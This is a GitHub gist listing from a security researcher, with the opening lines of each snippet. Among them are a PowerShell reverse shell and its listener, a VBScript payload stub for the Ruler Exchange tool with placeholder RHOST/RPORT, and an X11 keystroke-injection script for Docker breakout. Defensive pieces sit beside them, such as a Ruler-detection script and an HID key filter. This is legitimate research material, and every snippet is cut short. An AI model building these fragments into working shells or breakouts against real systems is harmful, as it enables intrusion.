Etienne Stalmans staaldraad

@staaldraad
staaldraad / docker-compose.yml
Created Jun 12, 2017
A docker-compose yml to use with Doorman and osquery
version: '2'
services:
  doorman:
    image: doorman
    container_name: "doorman"
    build:
      context: ./doorman
      dockerfile: Dockerfile_doorman
    links:

staaldraad / onDC.ps1
Created May 30, 2017
Detect Possible Ruler usage On Exchange and Domain Controller
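# Event ID 4776: the domain controller attempted to validate credentials for an account (NTLM).
Get-EventLog -InstanceId 4776 -LogName "Security" | ForEach-Object {
    # Split the event message into lines and look for the RULER marker
    $sp = $_.Message -split "`n"
    $tmp = $sp | Select-String -Pattern 'RULER'
    if ($tmp.Count -ge 1) {
        Write-Host "Possible Ruler usage at: " $_.TimeGenerated
        # Print the account that was being validated
        $sp | Select-String -Pattern 'Logon Account:' | Write-Host
    }
}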

staaldraad / Command.vbs
Last active Oct 16, 2019
Using VBSMeter with Ruler
Call X()
End Function
Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"
Function Base64ToStream(b)
Dim enc, length, ba, transform, ms
Set enc = CreateObject("System.Text.ASCIIEncoding")
length = enc.GetByteCount_2(b)

staaldraad / ioctlfilter.c
Created Mar 21, 2017
Filters keycodes from R400 presenter in Linux
/* Grabs all input from Logitech R400 presenter and filters to ensure only certain keys are pressed.
* Ensures that only valid R400 keys are pressed and not rogue keys injected.
* Main logic for this found here: http://stackoverflow.com/questions/7668872/need-to-intercept-hid-keyboard-events-and-then-block-them
* Author: Etienne Stalmans <etienne@sensepost.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

staaldraad / webdavserv.go
Last active Oct 12, 2020
A small webdav server in go
package main
import (
	"flag"
	"fmt"
	"log"
	"net/http"
	"os"
	"golang.org/x/net/webdav"

staaldraad / receivefile.ps1
Created Feb 24, 2017
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 192.168.1.7 8080```
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
    exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');

staaldraad / count words and sort
Created Dec 9, 2016
Count all words in a list and sort
grep -v "^\s*$" /tmp/cracked| sort | uniq -c | sort -bnr

staaldraad / mini-reverse.ps1
Created Oct 3, 2016
A reverse shell in Powershell
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;

staaldraad / mini-reverse-listener.ps1
Created Oct 3, 2016
A reverse shell listener in powershell
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413);
if($socket -eq $null){
    exit 1
}
$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"

staaldraad / x11.py
Last active Jun 2, 2019
Python script to do keystrokes via X11 abstract socket. Useful for silly docker breakout.
#!/usr/bin/python
"""
Python script to connect to an abstract unix socket created by X11 and send arbitrary key-strokes.
Created by: etienne@sensepost.com
Credits to: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/x11/x11_keyboard_exec.rb
Borrowed heavily from the original metasploit module. Thanks!
"""
from socket import *
import subprocess